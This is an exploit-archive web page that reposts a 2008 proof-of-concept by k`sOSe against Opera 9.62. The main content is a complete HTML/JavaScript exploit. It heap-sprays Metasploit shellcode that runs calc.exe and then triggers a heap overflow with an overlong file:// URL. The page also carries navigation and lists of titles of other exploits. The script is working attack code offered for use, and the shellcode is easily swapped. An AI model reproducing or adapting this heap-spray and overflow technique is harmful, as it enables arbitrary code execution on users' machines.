首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Opera 9.62 file:// Local Heap Overflow Exploit
来源:www.vfcocus.net 作者:k`sOSe 发布时间:2008-11-18  
<html>
<head><title>uh?</title></head>
<body>
<script>


// k`sOSe 11/15/2008
// tested on Windows XP SP3, opera 9.62 international version
// vulnerability found by send9

// there are many ways to achieve code execution, tons of function pointers to overwrite.
// maybe there's one more reliable...

var i=0;

// push es, pop es
var block = unescape("%u0607%u0607");

// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");

while (block.length < 81920) block += block;
var memory = new Array();
for (;i<1000;i++) memory[i] += (block + shellcode);


var evil = "file://";

        for(var i = 0; i<16438; i++)
                evil += "X";

evil += "R.";

window.location.replace(evil);

</script>

</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FREEze Greetings 1.0 Remote Pa
·MS Windows Server Service Code
·Chilkat Socket activex 2.3.1.1
·Minigal b13 (index.php list) R
·PunBB (Private Messaging Syste
·Sudo <= 1.6.9p18 (Defaults set
·MyTopix <= 1.3.0 (notes send)
·VeryPDF PDFView OCX ActiveX Op
·MauryCMS <= 0.53.2 Remote Shel
·Exploits Microsoft VISTA TCP/I
·SlimCMS <= 1.0.0 (edit.php) Re
·Portfolio <= 0.3 Remote Arbitr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved